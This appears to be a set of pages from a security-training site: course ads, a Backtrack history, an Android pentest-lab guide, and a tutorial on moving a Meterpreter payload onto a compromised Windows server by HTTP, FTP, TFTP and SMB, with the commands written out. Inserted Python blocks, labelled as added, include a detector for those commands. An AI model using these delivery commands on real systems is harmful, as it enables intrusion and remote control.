Offensive Cyber Expert Bundle

Do you really want to be the guy or girl who can just flat-out hack? I’m talking about the point where it just doesn’t matter what’s in front of you: you know that you can figure it out.

It doesn’t matter if you are up against Linux, Windows Server 2016, SharePoint, web apps, or custom apps where you need to modify public exploit code to attack them.

If that’s what you want to be then this is the course bundle for you.

For today only you can purchase this entire class bundle for only $200 – just click the add to cart below:


Linux

Being proficient in Linux in the InfoSec world today is an absolute must. This is the class that you absolutely want to take, not only to get familiar with Linux but to learn how to use Linux to perform InfoSec tasks, instead of learning just the basics of the operating system.

 


PowerShell

Just as with Linux, being proficient in PowerShell in the InfoSec world today is an absolute must, because all of Microsoft’s current technologies rely heavily on PowerShell. This is the class that you absolutely want to take, not only to get familiar with PowerShell but to learn how to use PowerShell to perform InfoSec tasks.

 


Offensive Cyber Operations
Offensive PowerShell with Cyber Range

This is the class where the rubber meets the road. This is the class where you put it all on the line and find out what works in the real world and what doesn’t. The Cyber Range is a full-blown modern Windows environment (Windows Server 2016, Active Directory 2016, and a SharePoint 2016 multi-server farm).

 


Exploit development

This is a fun class: 64-bit exploit development. Learn how to write exploits, and learn how to modify public exploits to suit your needs.

 


Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:

https://infosecaddicts.com/unlimited-classes/

NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.

Advanced Metasploit and Exploit Development Class

Advanced Metasploit and Exploit Development Class Bundle

I’ve updated both the Metasploit and the Exploit Development course. The Metasploit course is now heavily focused on auxiliary and post-module scripting, and the Exploit Development course finally has all of the Windows XP material removed. Each class is $150, or you can purchase them both as a bundle for $200.

 

Metasploit Next-Level
https://infosecaddicts.com/next-level-metasploit/
Take your Metasploit skills to the next level in this course, which is designed to take a user from little or no experience with Metasploit to using all of the most advanced features the tool has to offer.

This class is unique in that it starts with an introduction to Ruby scripting (for people with little programming experience), and is heavily focused on writing your own modules in Metasploit.

  • Ruby fundamentals
  • Writing simple Ruby scripts for security tasks
  • Metasploit structure and internals
  • Automating Metasploit with RC files
  • Writing auxiliary modules
  • Writing post modules
  • Writing exploits for Metasploit

This portion of the course bundle runs December 26th – 27th from 10am EST to 4pm EST each day.

Exploit Development
http://infosecaddicts.com/exploit-development/
This workshop is designed for participants with relatively little exposure to the subject of exploit development. We begin the class with lower-level, easy-to-grasp topics and then expand on those rapidly throughout the day.

For students with a limited programming background and experience, worry not! Templates are provided for each exploit, with the intent of cutting down on the raw programming time in class and focusing instead on the methodology and mindset that go into writing these different exploits.

Here are some of the topics to look forward to:

  • Stack Overflows
  • Abusing Structured Exception Handlers on Windows
  • Shellcoding Tricks (Negative jumps, egg hunters, fragmented shellcode)
  • Browser Exploits
  • PDF Exploits
  • ROP Exploits

This portion of the course bundle runs December 28th – 29th from 10am EST to 4pm EST each day.

You can register for this course bundle by filling out the form below


Capture The Flag (CTF) competition

We will be running Capture The Flag (CTF) competitions a few times this year. Here are the particulars:

 

Location of game: Online

Game Type: Team Network/Web Application/Programming Attack competition

Game Play: Scoring via placing a team file (flag) in the target servers’ root (/root or c:\ directory)

Skill Level: Beginner/Intermediate

Number of players per team: Teams can be up to 15 players

 

This type of game is very well suited to college infosec groups, CCDC players, security enthusiasts, blue teams, pentest teams, and red teams. It’s a pure attack game. There is no defense necessary, nor system administration tasks to do. You connect to the VPN and have fun attacking the targets in the network and scoring points.

 

Date/Time:

CTF Prep Class: September 9th from 10 am – 4 pm EST
CTF Prep Class: September 16th from 10 am – 4 pm EST

The CTF Prep students will have access to the target lab network from September 8th – 22nd.

The actual CTF event will be on September 23rd from 12 noon to 8 pm EST.

Cost:

CTF Prep class cost is: $100
CTF Competition is: $50 per participant

Note: CTF Prep class participants automatically receive registration for the CTF Competition

Sign up now and let’s have some fun


Game Basics:

This will be a fun game. Each team’s members will be given VPN access to the InfoSec Addicts target lab/CTF environment. Each team will be given a GPG-encrypted file that will serve as the team’s flag. That flag file must be copied to the appropriate directory on the victim server to count as that server being compromised and to have points awarded to that team.

 

Game Rules:

– You can use Nessus and Metasploit, but beware of bandwidth penalties, so keep scanning to a minimum.
– Password brute-forcing is acceptable
– Using commercial pentesting tools is acceptable (ex: Core, Saint, Canvas)
– Scoring server will verify that target host has been successfully exploited
– Man-in-the-middle attacks of any kind are NOT acceptable
– Attacking other teams is NOT acceptable

 

Game Requirements:

Stable internet connection with a minimum of 1Mbit/sec that can connect to UDP 1194 (OpenVPN port)

No commercial VPN licenses required to participate

 

Game Prizes

1st Place – 3 FREE InfoSec Addicts classes per team participant
2nd Place – 2 FREE InfoSec Addicts classes per team participant
3rd Place – 1 FREE InfoSec Addicts class per team participant

Signup now and let’s have some fun


Exploit Development

EXPLOIT DEVELOPMENT COURSE DESCRIPTION

This workshop is designed for participants with relatively little exposure to the subject of exploit development. We begin the class with lower-level, easy-to-grasp topics and then expand on those rapidly throughout the day.

For students with a limited programming background and experience, worry not! Templates are provided for each exploit, with the intent of cutting down on the raw programming time in class and focusing instead on the methodology and mindset that go into writing these different exploits.

Here are some of the topics to look forward to:

  • Stack Overflows
  • Abusing Structured Exception Handlers on Windows
  • Shellcoding Tricks (Negative jumps, egg hunters, fragmented shellcode)
  • Browser Exploits
  • PDF Exploits
  • ROP Exploits

WHO WOULD BENEFIT

Advanced IT Security Professionals (deep technical), IT Security Assessors (Penetration Testers), Application Developers, Intrusion Analysts

PREREQUISITES

Ethical Hacking experience

SCHEDULE

25th and 27th of June 2018 from 7pm to 9pm

Fill out this form to sign up for the class.

Class Cost: $200

 


Backtrack

Background to Backtrack

You must have come across the word Backtrack when it comes to hacking on the Linux operating system. If you have never heard the word, and have never worked on its present-day successor either, then trust me, you are missing a lot. But why do you think I am taking this so seriously?

The answer basically lies in two fancy and interesting notions: digital forensics and penetration testing. In case you do not know much about these two, I will explain them in a nutshell right here. Digital forensics is the field of forensic science that specializes in the investigation of material found in digital devices such as computers and mobile devices. On the other side, penetration testing is a simulation of an actual attack on a system to scan for its vulnerabilities, exploit them, and thereby gain access to the data and features of that system.

Now I can tell you the reason why you might not have heard of it. You didn’t start hacking until 2013, when Kali Linux was released as a rebuilt version of Backtrack. It was the Offensive Security team who were responsible for this turning point. At that time it was rebuilt around the Debian distribution, while it was originally based on the Knoppix distribution. Both Knoppix and Debian are Unix-like operating system distributions, yet each has its own unique features.

One good thing about it is the wide variety of users its development team aimed to serve. As opposed to several other security software tools, it makes it very simple for beginner penetration testers to get much closer to the field and gain more experience. Moreover, its community was composed of individuals from diverse backgrounds. Skilled penetration testers, government entities, those who were motivated to learn and contribute to information technology in general and computer security in particular, and those who were still new to the field were all covered under the umbrella of Backtrack and its community.

History

A good way to analyze a hacking platform is to first briefly get in touch with its history, hoping to understand the background of its founders and their purposes behind this security tool. The story begins when WHAX and Auditor Security Collection merged after years of severe competition between the two. Both were targeted at penetration testing, and merging them resulted in a very effective tool in the same field, named Backtrack.

WHAX was based on the Slax distribution of Linux, for which Mati Aharoni was well known at the time (he is now famous for creating Backtrack and Kali Linux as well, of course). Whoppix, the predecessor of WHAX, was on the other hand based on Knoppix, which was referred to earlier in the article.

Alright, now we know what WHAX was; what was Auditor Security Collection then? Well, its organizer Max Moser designed it to include more than three hundred tools in a user-friendly manner to assist in penetration testing. It was, in fact, a live CD, and it was built on Knoppix.

It went through eleven main stages/releases until its last release. Every release has since lost all support from the Backtrack development team; now there is no support for any version, since Kali Linux is its replacement.

  1. Backtrack v1.0 Beta was released in February 2006.
  2. Backtrack v1.0 was first released in March of the same year.
  3. The release of Backtrack v2.0 occurred in 2007.
  4. Backtrack v3.0 then got released in 2008.
  5. January 2010 witnessed the Backtrack v4.0 final release.
  6. Backtrack 4 R1 was released in May 2010.
  7. In November 2010, Backtrack 4 R2 had its release.
  8. May 2011 ushered in the release of Backtrack 5.
  9. August 2011 witnessed the release of Backtrack 5 R1.
  10. Backtrack 5 R2 then had its release in March 2012.
  11. The release of the final version, Backtrack 5 R3, happened in August 2012.

What tools does Backtrack allow?

In order for us to see how effective and comprehensive Backtrack really is, we have to remind ourselves of the security tools combined and supported by it. Before we go through such tools, always remember a very important feature which grants it a great advantage over its companions, if there are any.

Backtrack allows installation from portable media such as CDs and USB flash disks, from which it is run live on a device. Similarly, Backtrack allows and supports installation on hard disks. Simply put, one installs it from, or boots it from, a Live DVD or thumb drive.

Now, it is time to expose ourselves to a great list of highly used security tools that Backtrack supports.

  • Metasploit, a computer security project that shows vulnerabilities and aids in penetration testing. Go and check the article titled “What is Metasploit” on infosecaddicts.com
  • Armitage, Metasploit’s graphical front end, showing vulnerabilities in a clear manner and recommending actions and exploits as well.
  • The Windows log-in password cracker called Ophcrack
  • Hydra, which is another password cracking tool.
  • A famous network detector and packet sniffer called Kismet
  • The de-facto network packet sniffer and analyzer, Wireshark.
  • Cisco OCS Mass Scanner, a fast scanner that tests Cisco routers for default telnet and enable passwords.
  • Aircrack-ng, the magical Wi-Fi network sniffer and cracker
  • Another Wi-Fi cracker named Gerix
  • All Wi-Fi drivers which allow monitor mode and packet injection, i.e. interfering with an already established network.
  • The incredible Nmap network scanner, to find hosts and services and create a map of the entire network
  • Browser Exploitation Framework (BeEF)
  • Several exploits are included, and commonplace software like web browsers is also included.

To be honest, it is almost impossible to mention every single included tool and type it out here; it would get silly that way, with no real benefit. Nonetheless, another means to display the other tools is to elaborate on the categories into which they were divided for Backtrack. In fact, there were twelve categories, turning into thirteen in the latest “Kali” version. While here I will refer to the thirteen of Kali, I will refer to the twelve later on in this article for the sake of comparability.

  1. Information Gathering, such as DMitry
  2. Vulnerability Analysis, like Inguma
  3. Exploitation Tools, such as the Metasploit Framework
  4. Wireless Attacks, like WIFI Honey
  5. Forensics, such as Binwalk
  6. Web Applications, like Skipfish
  7. Stress Testing, like FunkLoad
  8. Sniffing and Spoofing, such as Wireshark
  9. Password Attacks, like those done by TrueCrack
  10. Maintaining Access, such as Intersect
  11. Hardware Hacking, performed by dex2jar for instance
  12. Reverse Engineering, for which we can use Apktool, for instance
  13. Reporting Tools, such as MagicTree

Getting Started with Backtrack

In this section, I will walk through its main features, with screenshots attached for further illustration. Although all of these screenshots are of the latest version, Backtrack 5 R3, I prefer that, if you have the chance, you use Kali Linux instead. My reason is that there is no support for Backtrack anymore.

  • The Backtrack Menu (screenshot)
  • Leave Menu (screenshot)
  • Utilities Menu (screenshot)
  • The System Menu: it displays applications essential for a hacker (screenshot)
  • The Internet Menu (screenshot)
  • BackTrack menu: here I am mentioning the twelve categories as per the latest release of Backtrack (screenshot)

  1. Information Gathering
  2. Vulnerability Management
  3. Exploitation tools
  4. Privilege Escalation
  5. Maintaining Access
  6. Reverse Engineering
  7. RFID Tools
  8. Stress Testing
  9. Forensics
  10. Reporting Tools
  11. Services
  12. Miscellaneous
  • Exploitation Tools (screenshot)


How Can a Penetration Testing Lab Be Built For Android?

Concepts we need to understand first of all:

  • Penetration Testing:

It is highly probable that you have heard of penetration testing at some point while investigating the topic of computer security. Or maybe you have worked on penetration testing against a web application or another system or computer network.

So what is meant by penetration testing in the first place? Well, in fact, it refers to the process of searching for vulnerabilities in a specific system. Meanwhile, information about the targeted system is collected in order for the pen tester to grasp which entry points could be exploited. Then an actual exploitation, or sometimes a virtual one, is carried out. Accordingly, conclusions are drawn from such testing of vulnerabilities to report how secure the system is.

Pen testers are usually referred to as white hat attackers, since they try to break the system which is being tested.

  • Android Platforms:

It comes as no surprise that every single person on earth is familiar with the word Android and realizes, first of all, that it is an operating system for mobile devices.

However, what we are more interested in is finding out the basics or fundamentals of this operating system: where does it come from, and from which operating system did it originate? In fact, it all started with the Linux kernel, for the sake of reaching a dependable operating system that works well on mobile devices and tablets.

It has now become a very common and effective operating system. There exists the Android Open Source Project (AOSP), which is basically an open project where several developers and geeks cooperate to develop new features.

  • Virtual Machines:

One concept that any computer enthusiast has to know very well and understand is the notion of virtualization. Physical computers or servers are no longer appropriate for companies who struggle to find room in their data centers to add new physical machines.

On the other hand, home users find it very hard to work on two, three, or even more operating systems and build connections between them. Either one has to buy several physical, actual computers on which to install whichever operating system is desired, or the other option is to have a comparably good computer with a large amount of random-access memory (RAM) and a large hard disk. Such resources are then distributed amongst the “virtual” machines which exist on the same “physical” host machine.

An example of full virtualization is a hypervisor, where the virtual machines are linked in one way or another directly to the hardware of the computer.

Operating-system-level virtualization, on the other hand, is where the virtual machines require an operating system to run on; thereby the virtual machines are linked to the hardware through that operating system in the middle. For instance, VirtualBox and VMware Workstation (VM Workstation) are two programs which work for this type of virtualization.

What types of software will be used for the process?

  1. VirtualBox:

It is used for virtualization purposes, to construct the lab as explained before.

  2. Santoku OS:

It is an operating system which already offers preinstalled Software Development Kits (SDKs). It is actually specialized in forensics investigations and penetration testing.

  3. Genymotion:

It is very important for creating the Android Virtual Device (AVD).

  4. InsecureBankv2:

It is a deliberately vulnerable Android app. It will help us begin the actual penetration testing in our newly created lab.

A detailed guide to penetration testing for Android

In order to accomplish our ultimate goal, we will walk through the following main steps.

  1. Download Santoku OS:
    1. As mentioned before, this software is intended for penetration testing purposes since it has pre-installed SDKs.
    2. Plenty of forensics tools are offered by this operating system, such as firmware flashing tools for multiple vendors.
    3. App details can also be enumerated via the various forensics scripts offered there.
  2. Install VirtualBox or VMware Workstation:
    1. Throughout this tutorial I will be using VirtualBox. However, you could also use VMware Workstation for the same purpose.
    2. First, open VirtualBox and create a new machine specifically for Santoku OS.
    3. Choose the RAM size dedicated to this newly created virtual machine. The recommended size is 786MB, but making it larger, for example 2GB, is fine.
    4. VMDK (Virtual Machine Disk) is the disk format option you should go for.
    5. Now specify the hard disk size you will need afterwards.
    6. Now install Santoku on the assigned virtual machine. Right-click the virtual machine and open the Storage settings; click the disk icon next to the optical drive, select the “empty” disk entry, and choose the Santoku ISO file.
    7. Run the virtual machine so that Santoku shows its boot menu, and choose the option “Install – start the installer directly”.
    8. Walk through the installation process and choose your preferred language.
  3. Download and install Genymotion:
    1. The Android operating system can be run through this software, where application testing is aided by OpenGL hardware acceleration.
    2. Download Genymotion and, after it is installed, browse to https://www.genymotion.com/account/create/
    3. Create a free account there for verification, then log in to the downloaded Genymotion inside the virtual machine.
    4. Create the AVD by clicking “Add” and selecting the preferred Android version and device brand for your task or preference.
    5. Review and confirm your choices. The virtual smartphone is created at this point.
    6. Data will start downloading onto the virtual device.
    7. Choose the device you want to work on. You will have several options if you added more than one device type.
  4. Connect Santoku to the virtual device so that its SDKs can be used:
    1. Find out which IP address the virtual device has.
    2. Open the command line in Santoku.
    3. Type the following command: adb connect <IP of Android Virtual Device>
    4. Make sure the device is connected with the command: adb devices
    5. The virtual Android device can now be accessed for penetration testing by opening a shell with the command: adb shell
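An added check for the last step, not code from the original article: the output of adb devices is the only confirmation that adb shell will work, and a device can be listed as offline or unauthorized rather than connected. The Python below parses a constructed adb devices -l listing (the addresses and product names are made up), validates the address handed to adb connect, and explains what to do for each state. It assumes the Genymotion device exposes adb on port 5555, and it only runs the real adb if the binary is on the PATH; the function names are my own.

```python
import ipaddress
import shutil
import subprocess
from typing import Dict, Optional, Tuple

# Constructed sample output of `adb devices -l` (hypothetical; addresses and models are made up).
SAMPLE_ADB_DEVICES = """\
List of devices attached
192.168.56.101:5555    device product:vbox86p model:Custom_Phone device:vbox86p
192.168.56.102:5555    offline
192.168.56.103:5555    unauthorized
emulator-5554          device product:sdk_phone model:sdk_phone device:generic
"""

ADB_DEFAULT_PORT = 5555  # assumption: the port the Genymotion virtual device listens on for adb


def connect_target(ip: str, port: int = ADB_DEFAULT_PORT) -> str:
    """Validate the address and build the <ip>:<port> argument given to `adb connect`."""
    ipaddress.ip_address(ip)  # raises ValueError on a hostname, a typo or an empty string
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return f"{ip}:{port}"


def parse_adb_devices(output: str) -> Dict[str, str]:
    """Map each serial in `adb devices` output to its state (device/offline/unauthorized/...)."""
    devices: Dict[str, str] = {}
    for line in output.splitlines():
        line = line.strip()
        # skip the header line, blank lines and daemon start-up notices ("* daemon ...")
        if not line or line.startswith("List of devices") or line.startswith("*"):
            continue
        parts = line.split()
        if len(parts) >= 2:
            devices[parts[0]] = parts[1]
    return devices


def device_ready(output: str, ip: str, port: int = ADB_DEFAULT_PORT) -> Tuple[bool, str]:
    """Decide whether the AVD at ip:port is usable for `adb shell`, saying why when it is not."""
    serial = connect_target(ip, port)
    state = parse_adb_devices(output).get(serial)
    if state is None:
        return False, f"{serial} not listed: run `adb connect {serial}` first"
    if state == "device":
        return True, f"{serial} is connected; `adb shell` will work"
    if state == "unauthorized":
        return False, f"{serial} is unauthorized: accept the USB debugging prompt on the device"
    if state == "offline":
        return False, f"{serial} is offline: disconnect and reconnect, or reboot the AVD"
    return False, f"{serial} is in unexpected state '{state}'"


def live_adb_devices() -> Optional[str]:
    """Return real `adb devices -l` output if adb is installed, otherwise None."""
    if shutil.which("adb") is None:
        return None
    return subprocess.run(["adb", "devices", "-l"], capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    listing = live_adb_devices() or SAMPLE_ADB_DEVICES
    for target in ("192.168.56.101", "192.168.56.102", "192.168.56.103", "192.168.56.104"):
        ready, why = device_ready(listing, target)
        print("READY     " if ready else "NOT READY ", why)
```

Run with no adb installed it evaluates the constructed listing, so the four outcomes (connected, offline, unauthorized, not listed) can be seen without a lab; with adb on the PATH it checks the real device table instead.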

 


Transfer Files from Linux to Windows (After Exploit)

Sometimes we need to copy a payload or a tool from a Kali Linux attack box, an advanced Linux distribution used for penetration testing, to a compromised Windows machine. But how can this be done? In order to elaborate on this idea, I will first start with an example.

A ColdFusion server was found vulnerable, and a ColdFusion Markup (CFM) web shell payload was to be used. Imagine you are able to hide or veil this payload; yet, since you are using a Kali Linux attack box, you really need a way to transfer a reverse Meterpreter binary, for further control and access, from the Linux machine to the Windows server running ColdFusion. How could this be possible?

I decided to write this article to make it easy for anyone facing the same issue. In the following lines, I will walk through 4 main methods that can be used to transfer such files: Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP), Trivial File Transfer Protocol (TFTP), and Server Message Block (SMB). Assume that for all of the following methods the copied file is called met8888.exe, its location is /root/shells, and “jarrieta” is the username used.

HTTP

There are in fact two ways to use HTTP: either you have access to the desktop, and hence can download the files through a browser, or you do not have desktop access and use the command line instead. Two steps are to be followed in this process:

  1. Start the server:

The first step is to make the files inside the current directory available over HTTP. To serve a file from Kali over HTTP, we can use Apache, which is installed in Kali by default, or we can use a Python HTTP server.

  • Using Apache:
    • Copy the file to /var/www/html
    • Start the Apache service
  • Using Python HTTP Server:
    • Type the following line inside the shell to start the Python web server directly in the current directory:

python -m SimpleHTTPServer

  • Choose the port number as an optional argument; if you skip this step, it will serve on port 8000 by default.

Press CTRL-C to kill the server when this step gets finished.

  2. Download the Files:

  • First Option: Desktop is accessible:
    • Visit the following link through the browser:

http://YOUR-KALI-IP/shell8888.exe ; e.g.:

http://10.9.122.8/shell8888.exe

  • Download the files through the browser
  • Second Option: You cannot access the desktop (using the command line):
    • Open the ordinary “Command Prompt”
    • Type the following command, which utilizes PowerShell’s WebClient object:

(new-object System.Net.WebClient).DownloadFile('http://10.9.122.8/met8888.exe','C:\Users\jarrieta\Desktop\met888.exe')


FTP

This is considered another good method to go for since there is a built in FTP client inside Windows: C:\Windows\System32\ftp.exe

This method supports file transfer in both directions; in other words, it allows its user to transfer files from Kali to Windows and vice versa. This aspect is not supported through HTTP. Two steps are to be followed in this process:

  1. Start the server:

In fact, there are three options to choose from when serving files through FTP:

  • First option: install vsftpd inside Kali, which works as a full-featured FTP server. It will still be installed after you transfer the files unless you uninstall it later on.
  • Second option: using the Python FTP server
    • Type the following command into the shell to install the FTP module:

apt-get install python-pyftpdlib

  • Now type:

python -m pyftpdlib

  • Choose the port number; if you skip this step, it will serve on port 2121 by default.
  • Add the -w flag to allow write access for the anonymous user.
  • Third option: using Metasploit (for more details on Metasploit, kindly refer to the article titled “What is Metasploit?”)
    • Use the module:

auxiliary/server/ftp

  • Point FTPROOT at the directory containing the files to be shared, using the following line:

set FTPROOT /root/shells

  • Run exploit
  • Type jobs -k <id> when you need to kill the server
  2. Download the Files:

This step is pretty straightforward since there is a built-in FTP client inside Windows. We do it in the following steps:

  • Open the command prompt
  • Open an FTP connection:

ftp 10.9.122.8

  • Enter the user name “anonymous” and type any password at the authentication stage
  • Download the files directly with the client’s get command
  • Alternatively, you can create a text file, named “ftp_commands.txt” for example, and include all the required answers (user name, password and the download commands) inside it as text.
  • A single command then performs all the aforementioned steps and downloads the file:

ftp -s:ftp_commands.txt 10.9.122.8

  • Either of these two methods gets you the file.

TFTP

Newer versions of Windows do not have the TFTP client installed, so it must first be enabled using the following command:

pkgmgr /iu:"TFTP"

Once it is installed, or if it was already installed, the process again takes two steps.

  1. Start the server:

There are two options:

  • Using Kali: service atftpd start

Although it is simple, it takes a lot of time.

  • Using Metasploit:
    • Use the module:

auxiliary/server/tftp

  • Point TFTPROOT at the directory containing the files to be shared, using the following line:

set TFTPROOT /root/shells

  • Run exploit
  2. Download the Files:

  • Open the command prompt
  • Use the -i flag (binary transfer mode) followed by the GET action, for example: tftp -i 10.9.122.8 GET met8888.exe
  • Use the PUT action to send files from Windows back to the server
  • Files sent that way are saved by default in /tmp

SMB

This method is convenient since SMB is built into Windows and no special commands are needed for the computer to understand Universal Naming Convention (UNC) paths. This way, you can use a single command to download and execute a payload. Two steps are required for the process:

  1. Start the server:

One way to do this is to install the Samba file server on Linux, which takes a lot of time that we do not really need to spend. The simpler method uses Python, through the following steps:

  • Use smbserver.py, which is part of a project called Impacket
  • Specify a share name and the path you want to share. For example, we can use the following command:

python smbserver.py ROPNOP /root/shells

  • By default, the server will listen on port 445, and any hashed challenge-responses from systems connecting to the server will be printed on the screen.
  • To confirm the previous step, on Linux we use smbclient, and on Windows we use net view.

  2. Copy/Execute the Files:

  • Open the command prompt
  • Treat the share \\10.9.122.8\ROPNOP as a local folder; commands like dir, copy and move work against it.
  • Use the copy command to copy the file
  • We could skip the last two steps and just run the file directly from the shared “local folder.”
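An added defender-side example, not code from the original article: each of the four transfer methods above leaves a distinctive process command line on the Windows host (a PowerShell WebClient DownloadFile call, ftp.exe with a -s: script file, tftp.exe with -i and GET or PUT, and a copy or execution from a UNC path). The Python script below runs simple rules for those four patterns over a handful of constructed process-creation command lines. The sample lines, the rule descriptions and the Rule and Hit classes are my own; the IP address, share name and file name are the ones used in the article.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Sequence

# Constructed sample process-creation command lines (hypothetical telemetry, shaped like
# the CommandLine field of a Sysmon Event ID 1 or Windows 4688 record). The first five
# mirror the four transfer methods in the article; the last two are benign.
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.9.122.8/met8888.exe','C:\Users\jarrieta\Desktop\met8888.exe')",
    r"ftp.exe -s:ftp_commands.txt 10.9.122.8",
    r"tftp.exe -i 10.9.122.8 GET met8888.exe",
    r"cmd.exe /c copy \\10.9.122.8\ROPNOP\met8888.exe C:\Users\jarrieta\Desktop\met8888.exe",
    r"cmd.exe /c \\10.9.122.8\ROPNOP\met8888.exe",
    r"notepad.exe C:\Users\jarrieta\notes.txt",
    r"powershell.exe -c Get-Process",
]


@dataclass(frozen=True)
class Rule:
    method: str          # which transfer method from the article the rule covers
    description: str     # analyst-facing explanation
    pattern: re.Pattern  # regex applied to the raw command line


RULES = [
    # HTTP: the WebClient one-liner, whether DownloadFile or DownloadString is used.
    Rule("http", "PowerShell WebClient download",
         re.compile(r"net\.webclient.*\.download(file|string)\s*\(", re.I)),
    # FTP: ftp.exe reading its answers from a script file is the non-interactive form.
    Rule("ftp", "ftp.exe driven by a script file (-s:)",
         re.compile(r"\bftp(\.exe)?\b.*\s-s:\S+", re.I)),
    # TFTP: binary-mode (-i) GET pulls a file in, PUT pushes one out.
    Rule("tftp", "tftp.exe binary transfer (-i ... GET/PUT)",
         re.compile(r"\btftp(\.exe)?\b.*\s-i\s.*\b(get|put)\b", re.I)),
    # SMB: a UNC path (\\host\share\...) as an argument or as the program itself.
    Rule("smb", r"copy or execution from a UNC path (\\host\share)",
         re.compile(r"(?:^|\s)\\\\[\w.-]+\\[^\s\\]+")),
]

IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


@dataclass(frozen=True)
class Hit:
    index: int             # position of the command line in the input
    method: str
    description: str
    source: Optional[str]  # first IPv4 address on the line: the server to pivot on


def remote_host(cmdline: str) -> Optional[str]:
    """Return the first IPv4 address in the command line, or None if there is none."""
    m = IPV4.search(cmdline)
    return m.group(1) if m else None


def classify(cmdline: str) -> List[str]:
    """Names of the transfer methods whose rule matches this command line."""
    return [rule.method for rule in RULES if rule.pattern.search(cmdline)]


def scan(command_lines: Sequence[str]) -> List[Hit]:
    """Apply every rule to every command line and collect the hits in input order."""
    hits: List[Hit] = []
    for index, line in enumerate(command_lines):
        for rule in RULES:
            if rule.pattern.search(line):
                hits.append(Hit(index, rule.method, rule.description, remote_host(line)))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_COMMAND_LINES):
        print(f"[{hit.method:4}] line {hit.index}: {hit.description} (server {hit.source})")
```

In production the input is the command-line field of Sysmon Event ID 1 or of Windows Security event 4688 with command-line auditing enabled. The ftp rule deliberately keys on the -s: script form, because that is what makes the download non-interactive, so an interactive ftp.exe session is not flagged by it; the extracted source address is what an analyst would use to find the serving host and the other machines that talked to it.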


Finally, take some time and look at my other article on Bypassing a Windows AppLocker.

Python For InfoSec Professionals

Python For InfoSec Professionals Night Class

This class aims at making students comfortable with using Python to perform simple IT security tasks. Going beyond using other people’s tools in this field is the hardest step on the ladder to proficiency. This class will take you over that difficult step, enabling you to modify popular security tools or write your own. Most importantly, it is all taught in a simple manner that won’t put you to sleep like most programming courses.

 

Class Outline

Programming Concepts, Parsing Files, Logs, and PCAPs

  • Python Basics
  • Text File Parsing
  • CSV File Parsing
  • Log Parsing


  • PCAP Parsing
  • Port-Scanning
  • Bind/Reverse Shells
  • Scapy

 

  • SQL Injection
  • XSS
  • RFI/LFI

 

  • Memory Analysis
  • Identifying/Classifying/Analyzing Malware
  • Exploit Development with Python
  • Debugger automation

Please register to attend the class:

 


Students will receive

  • 30 hours of CPEs
  • Courseware slides
  • Lab Manual

Class Videos

Each class will be recorded and made available to the students via email. So you can keep up with the class even if you have to miss time or even a whole day.

Support

Each student will receive access to an InfoSec Addicts Group (infosecaddicts.com) for the class. Groups are where students can ask questions outside of the regular class hours and work with other students on lab exercises, homework, and challenges.

A class mentor is assigned to the InfoSec Addicts Group to answer questions (allow one day for responses).

Similarly, a Customer Relationship Manager is assigned to the class to manage questions and support issues.

Class Schedule

28th and 30th of May 2018 from 7pm to 9pm EST

 

Class Cost: $200

Fill out this form to sign up for the class.
